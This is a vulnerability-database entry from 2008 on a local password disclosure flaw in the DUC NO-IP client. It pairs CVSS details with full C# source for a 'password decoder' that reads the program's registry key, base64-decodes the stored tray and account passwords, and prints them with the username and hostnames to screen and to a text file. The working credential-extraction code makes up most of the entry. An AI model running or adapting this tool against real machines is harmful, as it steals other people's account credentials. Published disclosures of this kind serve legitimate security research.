DUC NO-IP Local Password Information Disclosure Vulnerability

2008.06.22
Risk: Low
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

/* * DUC NO-IP Local Password Information Disclosure * Author(s): Charalambous Glafkos * George Nicolaou * Date: March 11, 2008 * Site: http://www.astalavista.com * Mail: glafkos (at) astalavista (dot) com [email concealed] * ishtus (at) astalavista (dot) com [email concealed] * * Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due to a design error. * Attackers can exploit this issue to obtain sensitive information including tray password, * web username, password and hostnames that may lead to further attacks. * * Note: Vendor has been notified long time ago confirming a design error. * Vendor site: http://www.no-ip.com * */ using System; using System.Text; using System.IO; using Microsoft.Win32; namespace getRegistryValue { class getValue { static void Main() { getValue details = new getValue(); String strDUC = details.getDUC(); Console.WriteLine("\nDUC NO-IP Password Decoder v1.2"); Console.WriteLine("Author: Charalambous Glafkos"); Console.WriteLine("Bugs: glafkos (at) astalavista (dot) com [email concealed]"); Console.WriteLine(strDUC); FileInfo t = new FileInfo("no-ip.txt"); StreamWriter Tex = t.CreateText(); Tex.WriteLine(strDUC); Tex.Write(Tex.NewLine); Tex.Close(); Console.WriteLine("\nThe file named no-ip.txt is created\n"); } private string getDUC() { RegistryKey ducKey = Registry.LocalMachine; ducKey = ducKey.OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false); String TrayPassword = DecodeBytes(ducKey.GetValue("TrayPassword").ToString()); String Username = ducKey.GetValue("Username").ToString(); String Password = DecodeBytes(ducKey.GetValue("Password").ToString()); String Hostnames = ducKey.GetValue("Hosts").ToString(); String strDUC = "\nTrayPassword: " + TrayPassword + "\nUsername: " + Username + "\nPassword: " + Password + "\nHostnames: " + Hostnames; return strDUC; } public static string DecodeBytes(String encryptedData) { Byte[] toDecodeByte = Convert.FromBase64String(encryptedData); System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding(); System.Text.Decoder utf8Decode = encoder.GetDecoder(); int charCount = utf8Decode.GetCharCount(toDecodeByte, 0, toDecodeByte.Length); Char[] decodedChar = new char[charCount]; utf8Decode.GetChars(toDecodeByte, 0, toDecodeByte.Length, decodedChar, 0); String result = new String(decodedChar); return (new string(decodedChar)); } } }

References:

http://www.securityfocus.com/bid/29758
http://www.securityfocus.com/archive/1/archive/1/493367/100/0/threaded
http://secunia.com/advisories/30714


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top